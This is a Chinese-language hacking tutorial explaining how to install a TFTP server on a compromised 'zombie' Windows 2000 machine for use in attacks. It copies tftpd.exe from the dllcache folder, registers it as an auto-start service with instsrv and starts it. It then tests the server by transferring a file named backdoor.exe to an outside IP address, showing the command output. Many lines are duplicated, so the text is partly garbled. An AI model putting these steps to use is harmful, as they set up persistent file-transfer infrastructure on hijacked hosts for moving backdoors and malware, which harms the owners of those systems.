我们在攻击的过程中经常要使用到tftp服务器,如果你不方便在你的机器上安装tftp服务器,那么可以在肉鸡上安装,这是比较好的方法。
我们先来学习一下什么叫作TFTP.
TFTP:(Trivial File Transfer Protocol). 小文件传输协议.
TFTP:是网络应用程序,它比FTP简单也比FTP功能少 ...
我们先来学习一下什么叫作TFTP.
TFTP:(Trivial File Transfer Protocol). 小文件传输协议.
TFTP:是网络应用程序,它比FTP简单也比FTP功能少 ...
就记住这么点基础吧,学知识取精华是最重要的,如果你一定要学的很深的话,自己去看TCP/IP吧。
我们首先找到系统中的tftpd.exe文件,一般我们可以在%systemroot%\system32\dllcache目录下找到该文件,建议把该文件copy到其他目录。
C:\>copy %systemroot%\system32\dllcache\tftpd.exe
%systemroot%\system32
已复制 1 个文件。
%systemroot%\system32
已复制 1 个文件。
我们会用Windows 2000下的Resource
Kits中的一个工具instsrv创建一个服务,instsrv的用法如下,当然,你也可以用其他的工具来实现(如srvinstw,GUI方式的)。
Kits中的一个工具instsrv创建一个服务,instsrv的用法如下,当然,你也可以用其他的工具来实现(如srvinstw,GUI方式的)。
添加一个服务,注意,该服务创建侯为自动启动。
C:\>instsrv tftp c:\winnt\system32\tftpd.exe
The service was successfuly added!
C:\>instsrv tftp c:\winnt\system32\tftpd.exe
The service was successfuly added!
Make sure that you go into the Control Panel and use
the Services applet to change the Account Name and
Password that this newly installed service will use
for its Security Context.
the Services applet to change the Account Name and
Password that this newly installed service will use
for its Security Context.
启动服务
C:\>net start tftp
tftp 服务正在启动 .
tftp 服务已经启动成功。
C:\>net start tftp
tftp 服务正在启动 .
tftp 服务已经启动成功。
测试服务是否正常工作
C:\>tftp -i 61.135.21.195 PUT backdoor.exe backdoor.exe
Transfer successful: 4209 bytes in 1 second, 4209
bytes/s
C:\>tftp -i 61.135.21.195 PUT backdoor.exe backdoor.exe
Transfer successful: 4209 bytes in 1 second, 4209
bytes/s
C:\>dir tftpdroot
驱动器 C 中的卷是 C
卷的序列号是 1E23-1907
驱动器 C 中的卷是 C
卷的序列号是 1E23-1907
C:\tftpdroot 的目录
2001-09-22 01:14 <DIR> .
2001-09-22 01:14 <DIR> ..
2001-09-22 01:14 4,209 backdoor.exe
1 个文件 4,209 字节
2 个目录 94,113,792 可用字节
2001-09-22 01:14 <DIR> ..
2001-09-22 01:14 4,209 backdoor.exe
1 个文件 4,209 字节
2 个目录 94,113,792 可用字节
注意,如果你上传文件,系统会在%systemdrive%自动创建一个名为tftproot的目录,OK,所有的工作已经完成了!
